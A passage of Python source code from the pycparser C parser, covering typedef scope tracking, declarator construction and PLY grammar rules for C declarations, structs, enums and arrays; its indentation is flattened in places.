# If name is an identifier in this scope it shadows typedefs in
# higher scopes.
in_scope = scope.get(name)
if in_scope is not None: return in_scope
return False
def _lex_error_func(self, msg, line, column):
self._parse_error(msg, self._coord(line, column))
    def _lex_on_lbrace_func(self):
        # Lexer callback: a '{' opens a new scope for typedef/ID tracking.
        self._push_scope()
    def _lex_on_rbrace_func(self):
        # Lexer callback: a '}' closes the innermost scope.
        self._pop_scope()
def _lex_type_lookup_func(self, name):
""" Looks up types that were previously defined with
typedef.
Passed to the lexer for recognizing identifiers that
are types.
"""
is_type = self._is_type_in_scope(name)
return is_type
    def _get_yacc_lookahead_token(self):
        """ We need access to yacc's lookahead token in certain cases.
            This is the last token yacc requested from the lexer, so we
            ask the lexer.
        """
        # The lexer records every token it hands out; the most recent one is
        # exactly yacc's current lookahead.
        return self.clex.last_token
# To understand what's going on here, read sections A.8.5 and
# A.8.6 of K&R2 very carefully.
#
# A C type consists of a basic type declaration, with a list
# of modifiers. For example:
#
# int *c[5];
#
# The basic declaration here is 'int c', and the pointer and
# the array are the modifiers.
#
# Basic declarations are represented by TypeDecl (from module c_ast) and the
# modifiers are FuncDecl, PtrDecl and ArrayDecl.
#
# The standard states that whenever a new modifier is parsed, it should be
# added to the end of the list of modifiers. For example:
#
# K&R2 A.8.6.2: Array Declarators
#
# In a declaration T D where D has the form
# D1 [constant-expression-opt]
# and the type of the identifier in the declaration T D1 is
# "type-modifier T", the type of the
# identifier of D is "type-modifier array of T"
#
# This is what this method does. The declarator it receives
# can be a list of declarators ending with TypeDecl. It
# tacks the modifier to the end of this list, just before
# the TypeDecl.
#
# Additionally, the modifier may be a list itself. This is
# useful for pointers, that can come as a chain from the rule
# p_pointer. In this case, the whole modifier list is spliced
# into the new location.
def _type_modify_decl(self, decl, modifier):
""" Tacks a type modifier on a declarator, and returns
the modified declarator.
Note: the declarator and modifier may be modified
"""
#~ print '****'
#~ decl.show(offset=3)
#~ modifier.show(offset=3)
#~ print '****'
modifier_head = modifier
modifier_tail = modifier
# The modifier may be a nested list. Reach its tail.
#
while modifier_tail.type:
modifier_tail = modifier_tail.type
# If the decl is a basic type, just tack the modifier onto
# it
#
if isinstance(decl, c_ast.TypeDecl):
modifier_tail.type = decl
return modifier
else:
# Otherwise, the decl is a list of modifiers. Reach
# its tail and splice the modifier onto the tail,
# pointing to the underlying basic type.
#
decl_tail = decl
while not isinstance(decl_tail.type, c_ast.TypeDecl):
decl_tail = decl_tail.type
modifier_tail.type = decl_tail.type
decl_tail.type = modifier_head
return decl
# Due to the order in which declarators are constructed,
# they have to be fixed in order to look like a normal AST.
#
# When a declaration arrives from syntax construction, it has
# these problems:
# * The innermost TypeDecl has no type (because the basic
# type is only known at the uppermost declaration level)
# * The declaration has no variable name, since that is saved
# in the innermost TypeDecl
# * The typename of the declaration is a list of type
# specifiers, and not a node. Here, basic identifier types
# should be separated from more complex types like enums
# and structs.
#
# This method fixes these problems.
#
    def _fix_decl_name_type(self, decl, typename):
        """ Fixes a declaration. Modifies decl in place and returns it.

            Pulls the name out of the innermost TypeDecl, propagates the
            qualifiers, and attaches the type built from *typename* (a list
            of type-specifier nodes).
        """
        # Reach the underlying basic type
        # (NOTE: 'type' and 'id' below shadow builtins; names kept as-is.)
        #
        type = decl
        while not isinstance(type, c_ast.TypeDecl):
            type = type.type

        decl.name = type.declname
        type.quals = decl.quals

        # The typename is a list of types. If any type in this
        # list isn't an IdentifierType, it must be the only
        # type in the list (it's illegal to declare "int enum ..")
        # If all the types are basic, they're collected in the
        # IdentifierType holder.
        #
        for tn in typename:
            if not isinstance(tn, c_ast.IdentifierType):
                if len(typename) > 1:
                    self._parse_error(
                        "Invalid multiple types specified", tn.coord)
                else:
                    # Single non-basic type (struct/union/enum): use it
                    # directly and we're done.
                    type.type = tn
                    return decl

        if not typename:
            # Functions default to returning int
            #
            if not isinstance(decl.type, c_ast.FuncDecl):
                self._parse_error(
                        "Missing type in declaration", decl.coord)
            type.type = c_ast.IdentifierType(
                ['int'],
                coord=decl.coord)
        else:
            # At this point, we know that typename is a list of IdentifierType
            # nodes. Concatenate all the names into a single list.
            #
            type.type = c_ast.IdentifierType(
                [name for id in typename for name in id.names],
                coord=typename[0].coord)
        return decl
def _add_declaration_specifier(self, declspec, newspec, kind, append=False):
""" Declaration specifiers are represented by a dictionary
with the entries:
* qual: a list of type qualifiers
* storage: a list of storage type qualifiers
* type: a list of type specifiers
* function: a list of function specifiers
This method is given a declaration specifier, and a
new specifier of a given kind.
If `append` is True, the new specifier is added to the end of
the specifiers list, otherwise it's added at the beginning.
Returns the declaration specifier, with the new
specifier incorporated.
"""
spec = declspec or dict(qual=[], storage=[], type=[], function=[])
if append:
spec[kind].append(newspec)
else:
spec[kind].insert(0, newspec)
return spec
    def _build_declarations(self, spec, decls, typedef_namespace=False):
        """ Builds a list of declarations all sharing the given specifiers.

            spec is a declaration-specifiers dict (qual/storage/type/function
            lists); decls is a list of dicts with 'decl' and optionally
            'init'/'bitsize' entries. Returns a list of Decl/Typedef nodes.

            If typedef_namespace is true, each declared name is added
            to the "typedef namespace", which also includes objects,
            functions, and enum constants.
        """
        is_typedef = 'typedef' in spec['storage']
        declarations = []

        # Bit-fields are allowed to be unnamed.
        #
        if decls[0].get('bitsize') is not None:
            pass

        # When redeclaring typedef names as identifiers in inner scopes, a
        # problem can occur where the identifier gets grouped into
        # spec['type'], leaving decl as None. This can only occur for the
        # first declarator.
        #
        elif decls[0]['decl'] is None:
            if len(spec['type']) < 2 or len(spec['type'][-1].names) != 1 or \
                    not self._is_type_in_scope(spec['type'][-1].names[0]):
                coord = '?'
                for t in spec['type']:
                    if hasattr(t, 'coord'):
                        coord = t.coord
                        break

                self._parse_error('Invalid declaration', coord)

            # Make this look as if it came from "direct_declarator:ID"
            decls[0]['decl'] = c_ast.TypeDecl(
                declname=spec['type'][-1].names[0],
                type=None,
                quals=None,
                coord=spec['type'][-1].coord)
            # Remove the "new" type's name from the end of spec['type']
            del spec['type'][-1]

        # A similar problem can occur where the declaration ends up looking
        # like an abstract declarator. Give it a name if this is the case.
        #
        elif not isinstance(decls[0]['decl'],
                (c_ast.Struct, c_ast.Union, c_ast.IdentifierType)):
            decls_0_tail = decls[0]['decl']
            while not isinstance(decls_0_tail, c_ast.TypeDecl):
                decls_0_tail = decls_0_tail.type
            if decls_0_tail.declname is None:
                decls_0_tail.declname = spec['type'][-1].names[0]
                del spec['type'][-1]

        for decl in decls:
            assert decl['decl'] is not None
            if is_typedef:
                declaration = c_ast.Typedef(
                    name=None,
                    quals=spec['qual'],
                    storage=spec['storage'],
                    type=decl['decl'],
                    coord=decl['decl'].coord)
            else:
                declaration = c_ast.Decl(
                    name=None,
                    quals=spec['qual'],
                    storage=spec['storage'],
                    funcspec=spec['function'],
                    type=decl['decl'],
                    init=decl.get('init'),
                    bitsize=decl.get('bitsize'),
                    coord=decl['decl'].coord)

            # struct/union/enum declarations don't carry a declarator chain
            # that needs name/type fix-up.
            if isinstance(declaration.type,
                    (c_ast.Struct, c_ast.Union, c_ast.IdentifierType)):
                fixed_decl = declaration
            else:
                fixed_decl = self._fix_decl_name_type(declaration, spec['type'])

            # Add the type name defined by typedef to a
            # symbol table (for usage in the lexer)
            #
            if typedef_namespace:
                if is_typedef:
                    self._add_typedef_name(fixed_decl.name, fixed_decl.coord)
                else:
                    self._add_identifier(fixed_decl.name, fixed_decl.coord)

            declarations.append(fixed_decl)

        return declarations
    def _build_function_definition(self, spec, decl, param_decls, body):
        """ Builds a function definition.

            spec: declaration-specifiers dict with keys
                  'qual'/'storage'/'type'/'function'
            decl: the function's declarator node
            param_decls: K&R-style parameter declaration list, or None
            body: Compound statement forming the function body

            Returns a c_ast.FuncDef node.
        """
        # 'typedef' is not a valid storage class on a function definition.
        assert 'typedef' not in spec['storage']
        # Build the function's Decl via the common declaration machinery,
        # registering its name so the lexer sees it as an identifier.
        declaration = self._build_declarations(
            spec=spec,
            decls=[dict(decl=decl, init=None)],
            typedef_namespace=True)[0]
        return c_ast.FuncDef(
            decl=declaration,
            param_decls=param_decls,
            body=body,
            coord=decl.coord)
def _select_struct_union_class(self, token):
""" Given a token (either STRUCT or UNION), selects the
appropriate AST class.
"""
if token == 'struct':
return c_ast.Struct
else:
return c_ast.Union
##
## Precedence and associativity of operators
##
precedence = (
('left', 'LOR'),
('left', 'LAND'),
('left', 'OR'),
('left', 'XOR'),
('left', 'AND'),
('left', 'EQ', 'NE'),
('left', 'GT', 'GE', 'LT', 'LE'),
('left', 'RSHIFT', 'LSHIFT'),
('left', 'PLUS', 'MINUS'),
('left', 'TIMES', 'DIVIDE', 'MOD')
)
##
## Grammar productions
## Implementation of the BNF defined in K&R2 A.13
##
# Wrapper around a translation unit, to allow for empty input.
# Not strictly part of the C99 Grammar, but useful in practice.
#
    def p_translation_unit_or_empty(self, p):
        """ translation_unit_or_empty   : translation_unit
                                        | empty
        """
        # Top-level rule: wrap the parsed unit (or nothing at all, for an
        # empty input file) in a FileAST root node.
        if p[1] is None:
            p[0] = c_ast.FileAST([])
        else:
            p[0] = c_ast.FileAST(p[1])
    def p_translation_unit_1(self, p):
        """ translation_unit    : external_declaration
        """
        # Note: external_declaration is already a list
        #
        p[0] = p[1]
def p_translation_unit_2(self, p):
""" translation_unit : translation_unit external_declaration
"""
p[1].extend(p[2])
p[0] = p[1]
# Declarations always come as lists (because they can be
# several in one line), so we wrap the function definition
# into a list as well, to make the return value of
# external_declaration homogenous.
#
    def p_external_declaration_1(self, p):
        """ external_declaration    : function_definition
        """
        # Wrap the single FuncDef in a list for homogeneity (see above).
        p[0] = [p[1]]
    def p_external_declaration_2(self, p):
        """ external_declaration    : declaration
        """
        # A declaration is already a list of Decl nodes - pass it through.
        p[0] = p[1]
    def p_external_declaration_3(self, p):
        """ external_declaration    : pp_directive
                                    | pppragma_directive
        """
        # Preprocessor artifacts are wrapped in a list like everything else.
        p[0] = [p[1]]
    def p_external_declaration_4(self, p):
        """ external_declaration    : SEMI
        """
        # A stray top-level ';' contributes nothing to the AST.
        p[0] = []
    def p_pp_directive(self, p):
        """ pp_directive  : PPHASH
        """
        # Raw '#' directives should have been handled by a preprocessor
        # before parsing; seeing one here is an error.
        self._parse_error('Directives not supported yet',
                          self._token_coord(p, 1))
def p_pppragma_directive(self, p):
""" pppragma_directive : PPPRAGMA
| PPPRAGMA PPPRAGMASTR
"""
if len(p) == 3:
p[0] = c_ast.Pragma(p[2], self._token_coord(p, 2))
else:
p[0] = c_ast.Pragma("", self._token_coord(p, 1))
# In function definitions, the declarator can be followed by
# a declaration list, for old "K&R style" function definitios.
#
    def p_function_definition_1(self, p):
        """ function_definition : id_declarator declaration_list_opt compound_statement
        """
        # no declaration specifiers - 'int' becomes the default type
        # (implicit-int, pre-C99 style)
        spec = dict(
            qual=[],
            storage=[],
            type=[c_ast.IdentifierType(['int'],
                                       coord=self._token_coord(p, 1))],
            function=[])
        p[0] = self._build_function_definition(
            spec=spec,
            decl=p[1],
            param_decls=p[2],
            body=p[3])
    def p_function_definition_2(self, p):
        """ function_definition : declaration_specifiers id_declarator declaration_list_opt compound_statement
        """
        # Fully-specified definition: return type/qualifiers come from the
        # declaration specifiers.
        spec = p[1]
        p[0] = self._build_function_definition(
            spec=spec,
            decl=p[2],
            param_decls=p[3],
            body=p[4])
    def p_statement(self, p):
        """ statement   : labeled_statement
                        | expression_statement
                        | compound_statement
                        | selection_statement
                        | iteration_statement
                        | jump_statement
                        | pppragma_directive
                        | comment_cond_statement
        """
        # Pure dispatch - pass the concrete statement node through.
        p[0] = p[1]
# A pragma is generally considered a decorator rather than an actual statement.
# Still, for the purposes of analyzing an abstract syntax tree of C code,
# pragma's should not be ignored and were previously treated as a statement.
# This presents a problem for constructs that take a statement such as labeled_statements,
# selection_statements, and iteration_statements, causing a misleading structure
# in the AST. For example, consider the following C code.
#
# for (int i = 0; i < 3; i++)
# #pragma omp critical
# sum += 1;
#
# This code will compile and execute "sum += 1;" as the body of the for loop.
# Previous implementations of PyCParser would render the AST for this
# block of code as follows:
#
# For:
# DeclList:
# Decl: i, [], [], []
# TypeDecl: i, []
# IdentifierType: ['int']
# Constant: int, 0
# BinaryOp: <
# ID: i
# Constant: int, 3
# UnaryOp: p++
# ID: i
# Pragma: omp critical
# Assignment: +=
# ID: sum
# Constant: int, 1
#
# This AST misleadingly takes the Pragma as the body of the loop and the
# assignment then becomes a sibling of the loop.
#
# To solve edge cases like these, the pragmacomp_or_statement rule groups
# a pragma and its following statement (which would otherwise be orphaned)
# using a compound block, effectively turning the above code into:
#
# for (int i = 0; i < 3; i++) {
# #pragma omp critical
# sum += 1;
# }
def p_pragmacomp_or_statement(self, p):
""" pragmacomp_or_statement : pppragma_directive statement
| statement
"""
if isinstance(p[1], c_ast.Pragma) and len(p) == 3:
p[0] = c_ast.Compound(
block_items=[p[1], p[2]],
coord=self._token_coord(p, 1))
else:
p[0] = p[1]
# In C, declarations can come several in a line:
# int x, *px, romulo = 5;
#
# However, for the AST, we will split them to separate Decl
# nodes.
#
# This rule splits its declarations and always returns a list
# of Decl nodes, even if it's one element long.
#
    def p_decl_body(self, p):
        """ decl_body : declaration_specifiers init_declarator_list_opt
                      | declaration_specifiers_no_type id_init_declarator_list_opt
        """
        spec = p[1]
        # p[2] (init_declarator_list_opt) is either a list or None
        #
        if p[2] is None:
            # By the standard, you must have at least one declarator unless
            # declaring a structure tag, a union tag, or the members of an
            # enumeration.
            #
            ty = spec['type']
            s_u_or_e = (c_ast.Struct, c_ast.Union, c_ast.Enum)
            if len(ty) == 1 and isinstance(ty[0], s_u_or_e):
                # e.g. 'struct Foo { ... };' - a tag declaration with no
                # declarator; emit a single nameless Decl.
                decls = [c_ast.Decl(
                    name=None,
                    quals=spec['qual'],
                    storage=spec['storage'],
                    funcspec=spec['function'],
                    type=ty[0],
                    init=None,
                    bitsize=None,
                    coord=ty[0].coord)]
            # However, this case can also occur on redeclared identifiers in
            # an inner scope.  The trouble is that the redeclared type's name
            # gets grouped into declaration_specifiers; _build_declarations
            # compensates for this.
            #
            else:
                decls = self._build_declarations(
                    spec=spec,
                    decls=[dict(decl=None, init=None)],
                    typedef_namespace=True)
        else:
            # Normal path: one Decl per declarator in the list.
            decls = self._build_declarations(
                spec=spec,
                decls=p[2],
                typedef_namespace=True)
        p[0] = decls
# The declaration has been split to a decl_body sub-rule and
# SEMI, because having them in a single rule created a problem
# for defining typedefs.
#
# If a typedef line was directly followed by a line using the
# type defined with the typedef, the type would not be
# recognized. This is because to reduce the declaration rule,
# the parser's lookahead asked for the token after SEMI, which
# was the type from the next line, and the lexer had no chance
# to see the updated type symbol table.
#
# Splitting solves this problem, because after seeing SEMI,
# the parser reduces decl_body, which actually adds the new
# type into the table to be seen by the lexer before the next
# line is reached.
    def p_declaration(self, p):
        """ declaration : decl_body SEMI
        """
        # decl_body does all the work (see comment above on why the SEMI
        # is split off); just forward its list of Decl nodes.
        p[0] = p[1]
# Since each declaration is a list of declarations, this
# rule will combine all the declarations and return a single
# list
#
def p_declaration_list(self, p):
""" declaration_list : declaration
| declaration_list declaration
"""
p[0] = p[1] if len(p) == 2 else p[1] + p[2]
# To know when declaration-specifiers end and declarators begin,
# we require declaration-specifiers to have at least one
# type-specifier, and disallow typedef-names after we've seen any
# type-specifier. These are both required by the spec.
#
    def p_declaration_specifiers_no_type_1(self, p):
        """ declaration_specifiers_no_type  : type_qualifier declaration_specifiers_no_type_opt
        """
        # Prepend the qualifier (const/volatile/restrict) to the spec dict.
        p[0] = self._add_declaration_specifier(p[2], p[1], 'qual')
    def p_declaration_specifiers_no_type_2(self, p):
        """ declaration_specifiers_no_type  : storage_class_specifier declaration_specifiers_no_type_opt
        """
        # Prepend the storage class (static/extern/...) to the spec dict.
        p[0] = self._add_declaration_specifier(p[2], p[1], 'storage')
    def p_declaration_specifiers_no_type_3(self, p):
        """ declaration_specifiers_no_type  : function_specifier declaration_specifiers_no_type_opt
        """
        # Prepend the function specifier (inline) to the spec dict.
        p[0] = self._add_declaration_specifier(p[2], p[1], 'function')
    def p_declaration_specifiers_1(self, p):
        """ declaration_specifiers  : declaration_specifiers type_qualifier
        """
        # Append a qualifier seen after a type specifier.
        p[0] = self._add_declaration_specifier(p[1], p[2], 'qual', append=True)
    def p_declaration_specifiers_2(self, p):
        """ declaration_specifiers  : declaration_specifiers storage_class_specifier
        """
        # Append a storage class seen after a type specifier.
        p[0] = self._add_declaration_specifier(p[1], p[2], 'storage', append=True)
    def p_declaration_specifiers_3(self, p):
        """ declaration_specifiers  : declaration_specifiers function_specifier
        """
        # Append a function specifier seen after a type specifier.
        p[0] = self._add_declaration_specifier(p[1], p[2], 'function', append=True)
    def p_declaration_specifiers_4(self, p):
        """ declaration_specifiers  : declaration_specifiers type_specifier_no_typeid
        """
        # Additional basic type words ('long long', 'unsigned int', ...);
        # typedef names are deliberately excluded here (see comment above).
        p[0] = self._add_declaration_specifier(p[1], p[2], 'type', append=True)
    def p_declaration_specifiers_5(self, p):
        """ declaration_specifiers  : type_specifier
        """
        # First (and possibly only) type specifier starts a fresh spec dict.
        p[0] = self._add_declaration_specifier(None, p[1], 'type')
    def p_declaration_specifiers_6(self, p):
        """ declaration_specifiers  : declaration_specifiers_no_type type_specifier
        """
        # Qualifiers/storage seen first, then the type specifier arrives.
        p[0] = self._add_declaration_specifier(p[1], p[2], 'type', append=True)
    def p_storage_class_specifier(self, p):
        """ storage_class_specifier : AUTO
                                    | REGISTER
                                    | STATIC
                                    | EXTERN
                                    | TYPEDEF
        """
        # Keep the raw keyword string.
        p[0] = p[1]
    def p_function_specifier(self, p):
        """ function_specifier  : INLINE
        """
        # Keep the raw keyword string.
        p[0] = p[1]
    def p_type_specifier_no_typeid(self, p):
        """ type_specifier_no_typeid  : VOID
                                      | _BOOL
                                      | CHAR
                                      | SHORT
                                      | INT
                                      | LONG
                                      | FLOAT
                                      | DOUBLE
                                      | _COMPLEX
                                      | SIGNED
                                      | UNSIGNED
                                      | __INT128
        """
        # A single basic-type keyword becomes a one-name IdentifierType;
        # multi-word types ('unsigned long') are merged later from the
        # accumulated spec['type'] list.
        p[0] = c_ast.IdentifierType([p[1]], coord=self._token_coord(p, 1))
    def p_type_specifier(self, p):
        """ type_specifier  : typedef_name
                            | enum_specifier
                            | struct_or_union_specifier
                            | type_specifier_no_typeid
        """
        # Pure dispatch - forward the already-built node.
        p[0] = p[1]
    def p_type_qualifier(self, p):
        """ type_qualifier  : CONST
                            | RESTRICT
                            | VOLATILE
        """
        # Keep the raw keyword string.
        p[0] = p[1]
def p_init_declarator_list(self, p):
""" init_declarator_list : init_declarator
| init_declarator_list COMMA init_declarator
"""
p[0] = p[1] + [p[3]] if len(p) == 4 else [p[1]]
# Returns a {decl=<declarator> : init=<initializer>} dictionary
# If there's no initializer, uses None
#
def p_init_declarator(self, p):
""" init_declarator : declarator
| declarator EQUALS initializer
"""
p[0] = dict(decl=p[1], init=(p[3] if len(p) > 2 else None))
def p_id_init_declarator_list(self, p):
""" id_init_declarator_list : id_init_declarator
| id_init_declarator_list COMMA init_declarator
"""
p[0] = p[1] + [p[3]] if len(p) == 4 else [p[1]]
def p_id_init_declarator(self, p):
""" id_init_declarator : id_declarator
| id_declarator EQUALS initializer
"""
p[0] = dict(decl=p[1], init=(p[3] if len(p) > 2 else None))
# Require at least one type specifier in a specifier-qualifier-list
#
    def p_specifier_qualifier_list_1(self, p):
        """ specifier_qualifier_list    : specifier_qualifier_list type_specifier_no_typeid
        """
        # Append an extra basic type word to the running spec.
        p[0] = self._add_declaration_specifier(p[1], p[2], 'type', append=True)
    def p_specifier_qualifier_list_2(self, p):
        """ specifier_qualifier_list    : specifier_qualifier_list type_qualifier
        """
        # Append a qualifier to the running spec.
        p[0] = self._add_declaration_specifier(p[1], p[2], 'qual', append=True)
    def p_specifier_qualifier_list_3(self, p):
        """ specifier_qualifier_list  : type_specifier
        """
        # A lone type specifier starts a fresh spec dict.
        p[0] = self._add_declaration_specifier(None, p[1], 'type')
    def p_specifier_qualifier_list_4(self, p):
        """ specifier_qualifier_list  : type_qualifier_list type_specifier
        """
        # Qualifiers came first; build a spec with them and add the type.
        spec = dict(qual=p[1], storage=[], type=[], function=[])
        p[0] = self._add_declaration_specifier(spec, p[2], 'type', append=True)
# TYPEID is allowed here (and in other struct/enum related tag names), because
# struct/enum tags reside in their own namespace and can be named the same as types
#
    def p_struct_or_union_specifier_1(self, p):
        """ struct_or_union_specifier   : struct_or_union ID
                                        | struct_or_union TYPEID
        """
        klass = self._select_struct_union_class(p[1])
        # None means no list of members
        # (a reference to a previously declared tag, e.g. 'struct Foo x;')
        p[0] = klass(
            name=p[2],
            decls=None,
            coord=self._token_coord(p, 2))
    def p_struct_or_union_specifier_2(self, p):
        """ struct_or_union_specifier : struct_or_union brace_open struct_declaration_list brace_close
                                      | struct_or_union brace_open brace_close
        """
        # Anonymous (tagless) struct/union definition.
        klass = self._select_struct_union_class(p[1])
        if len(p) == 4:
            # Empty sequence means an empty list of members
            p[0] = klass(
                name=None,
                decls=[],
                coord=self._token_coord(p, 2))
        else:
            p[0] = klass(
                name=None,
                decls=p[3],
                coord=self._token_coord(p, 2))
    def p_struct_or_union_specifier_3(self, p):
        """ struct_or_union_specifier   : struct_or_union ID brace_open struct_declaration_list brace_close
                                        | struct_or_union ID brace_open brace_close
                                        | struct_or_union TYPEID brace_open struct_declaration_list brace_close
                                        | struct_or_union TYPEID brace_open brace_close
        """
        # Tagged struct/union definition (TYPEID allowed - see note above).
        klass = self._select_struct_union_class(p[1])
        if len(p) == 5:
            # Empty sequence means an empty list of members
            p[0] = klass(
                name=p[2],
                decls=[],
                coord=self._token_coord(p, 2))
        else:
            p[0] = klass(
                name=p[2],
                decls=p[4],
                coord=self._token_coord(p, 2))
    def p_struct_or_union(self, p):
        """ struct_or_union : STRUCT
                            | UNION
        """
        # Keep the raw keyword string.
        p[0] = p[1]
# Combine all declarations into a single list
#
def p_struct_declaration_list(self, p):
""" struct_declaration_list : struct_declaration
| struct_declaration_list struct_declaration
"""
if len(p) == 2:
p[0] = p[1] or []
else:
p[0] = p[1] + (p[2] or [])
    def p_struct_declaration_1(self, p):
        """ struct_declaration : specifier_qualifier_list struct_declarator_list_opt SEMI
        """
        spec = p[1]
        # specifier_qualifier_list cannot produce a storage class.
        assert 'typedef' not in spec['storage']
        if p[2] is not None:
            # Normal member declaration with one or more declarators.
            decls = self._build_declarations(
                spec=spec,
                decls=p[2])
        elif len(spec['type']) == 1:
            # Anonymous struct/union, gcc extension, C1x feature.
            # Although the standard only allows structs/unions here, I see no
            # reason to disallow other types since some compilers have typedefs
            # here, and pycparser isn't about rejecting all invalid code.
            #
            node = spec['type'][0]
            if isinstance(node, c_ast.Node):
                decl_type = node
            else:
                decl_type = c_ast.IdentifierType(node)
            decls = self._build_declarations(
                spec=spec,
                decls=[dict(decl=decl_type)])
        else:
            # Structure/union members can have the same names as typedefs.
            # The trouble is that the member's name gets grouped into
            # specifier_qualifier_list; _build_declarations compensates.
            #
            decls = self._build_declarations(
                spec=spec,
                decls=[dict(decl=None, init=None)])
        p[0] = decls
    def p_struct_declaration_2(self, p):
        """ struct_declaration : SEMI
        """
        # A lone ';' inside a struct declares nothing.
        p[0] = None
    def p_struct_declaration_3(self, p):
        """ struct_declaration : pppragma_directive
        """
        # Pragmas inside a struct body are kept as member-list entries.
        p[0] = [p[1]]
def p_struct_declarator_list(self, p):
""" struct_declarator_list : struct_declarator
| struct_declarator_list COMMA struct_declarator
"""
p[0] = p[1] + [p[3]] if len(p) == 4 else [p[1]]
# struct_declarator passes up a dict with the keys: decl (for
# the underlying declarator) and bitsize (for the bitsize)
#
def p_struct_declarator_1(self, p):
""" struct_declarator : declarator
"""
p[0] = {'decl': p[1], 'bitsize': None}
def p_struct_declarator_2(self, p):
""" struct_declarator : declarator COLON constant_expression
| COLON constant_expression
"""
if len(p) > 3:
p[0] = {'decl': p[1], 'bitsize': p[3]}
else:
p[0] = {'decl': c_ast.TypeDecl(None, None, None), 'bitsize': p[2]}
    def p_enum_specifier_1(self, p):
        """ enum_specifier  : ENUM ID
                            | ENUM TYPEID
        """
        # Reference to a previously declared enum tag - no value list.
        p[0] = c_ast.Enum(p[2], None, self._token_coord(p, 1))
    def p_enum_specifier_2(self, p):
        """ enum_specifier  : ENUM brace_open enumerator_list brace_close
        """
        # Anonymous enum definition with its enumerator list.
        p[0] = c_ast.Enum(None, p[3], self._token_coord(p, 1))
    def p_enum_specifier_3(self, p):
        """ enum_specifier  : ENUM ID brace_open enumerator_list brace_close
                            | ENUM TYPEID brace_open enumerator_list brace_close
        """
        # Tagged enum definition with its enumerator list.
        p[0] = c_ast.Enum(p[2], p[4], self._token_coord(p, 1))
def p_enumerator_list(self, p):
""" enumerator_list : enumerator
| enumerator_list COMMA
| enumerator_list COMMA enumerator
"""
if len(p) == 2:
p[0] = c_ast.EnumeratorList([p[1]], p[1].coord)
elif len(p) == 3:
p[0] = p[1]
else:
p[1].enumerators.append(p[3])
p[0] = p[1]
    def p_enumerator(self, p):
        """ enumerator  : ID
                        | ID EQUALS constant_expression
        """
        # Build the Enumerator node; value is None when no '=' is present.
        if len(p) == 2:
            enumerator = c_ast.Enumerator(
                        p[1], None,
                        self._token_coord(p, 1))
        else:
            enumerator = c_ast.Enumerator(
                        p[1], p[3],
                        self._token_coord(p, 1))
        # Enumerators are ordinary identifiers in the current scope;
        # register them so the lexer doesn't treat the name as a TYPEID.
        self._add_identifier(enumerator.name, enumerator.coord)
        p[0] = enumerator
    def p_declarator(self, p):
        """ declarator  : id_declarator
                        | typeid_declarator
        """
        # Pure dispatch - forward the declarator node.
        p[0] = p[1]
    @parameterized(('id', 'ID'), ('typeid', 'TYPEID'), ('typeid_noparen', 'TYPEID'))
    def p_xxx_declarator_1(self, p):
        """ xxx_declarator  : direct_xxx_declarator
        """
        # Template rule (expanded per 'xxx' by @parameterized): a declarator
        # without a pointer prefix is just its direct declarator.
        p[0] = p[1]
    @parameterized(('id', 'ID'), ('typeid', 'TYPEID'), ('typeid_noparen', 'TYPEID'))
    def p_xxx_declarator_2(self, p):
        """ xxx_declarator  : pointer direct_xxx_declarator
        """
        # Wrap the direct declarator in the pointer modifier chain.
        p[0] = self._type_modify_decl(p[2], p[1])
    @parameterized(('id', 'ID'), ('typeid', 'TYPEID'), ('typeid_noparen', 'TYPEID'))
    def p_direct_xxx_declarator_1(self, p):
        """ direct_xxx_declarator   : yyy
        """
        # Base case: a bare name becomes a TypeDecl whose inner type is
        # filled in later by _fix_decl_name_type.
        p[0] = c_ast.TypeDecl(
            declname=p[1],
            type=None,
            quals=None,
            coord=self._token_coord(p, 1))
    @parameterized(('id', 'ID'), ('typeid', 'TYPEID'))
    def p_direct_xxx_declarator_2(self, p):
        """ direct_xxx_declarator   : LPAREN xxx_declarator RPAREN
        """
        # Parenthesized declarator - grouping only, no new node.
        p[0] = p[2]
    @parameterized(('id', 'ID'), ('typeid', 'TYPEID'), ('typeid_noparen', 'TYPEID'))
    def p_direct_xxx_declarator_3(self, p):
        """ direct_xxx_declarator   : direct_xxx_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET
        """
        quals = (p[3] if len(p) > 5 else []) or []
        # Accept dimension qualifiers
        # Per C99 6.7.5.3 p7
        arr = c_ast.ArrayDecl(
            type=None,
            dim=p[4] if len(p) > 5 else p[3],
            dim_quals=quals,
            coord=p[1].coord)
        p[0] = self._type_modify_decl(decl=p[1], modifier=arr)
    @parameterized(('id', 'ID'), ('typeid', 'TYPEID'), ('typeid_noparen', 'TYPEID'))
    def p_direct_xxx_declarator_4(self, p):
        """ direct_xxx_declarator   : direct_xxx_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET
                                    | direct_xxx_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET
        """
        # C99 'static' inside array parameter brackets, e.g. int a[static 10].
        # Using slice notation for PLY objects doesn't work in Python 3 for the
        # version of PLY embedded with pycparser; see PLY Google Code issue 30.
        # Work around that here by listing the two elements separately.
        listed_quals = [item if isinstance(item, list) else [item]
            for item in [p[3],p[4]]]
        dim_quals = [qual for sublist in listed_quals for qual in sublist
            if qual is not None]
        arr = c_ast.ArrayDecl(
            type=None,
            dim=p[5],
            dim_quals=dim_quals,
            coord=p[1].coord)
        p[0] = self._type_modify_decl(decl=p[1], modifier=arr)
# Special for VLAs
#
@parameterized(('id', 'ID'), ('typeid', 'TYPEID'), ('typeid_noparen', 'TYPEID'))
def p_direct_xxx_declarator_5(self, p):
""" direct_xxx_declarator : direct_xxx_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET
"""
arr = c_ast.ArrayDecl(
type=None,
dim=c_ast.ID(p[4], self._token_coord(p, 4)),
dim_quals=p[3] if p[3] != None else [],
coord=p[1].coord)
p[0] = self._type_modify_decl(decl=p[1], modifier=arr)
    @parameterized(('id', 'ID'), ('typeid', 'TYPEID'), ('typeid_noparen', 'TYPEID'))
    def p_direct_xxx_declarator_6(self, p):
        """ direct_xxx_declarator   : direct_xxx_declarator LPAREN parameter_type_list RPAREN
                                    | direct_xxx_declarator LPAREN identifier_list_opt RPAREN
        """
        # Function declarator: wrap the declarator in a FuncDecl modifier.
        func = c_ast.FuncDecl(
            args=p[3],
            type=None,
            coord=p[1].coord)
        # To see why _get_yacc_lookahead_token is needed, consider:
        #   typedef char TT;
        #   void foo(int TT) { TT = 10; }
        # Outside the function, TT is a typedef, but inside (starting and
        # ending with the braces) it's a parameter.  The trouble begins with
        # yacc's lookahead token.  We don't know if we're declaring or
        # defining a function until we see LBRACE, but if we wait for yacc to
        # trigger a rule on that token, then TT will have already been read
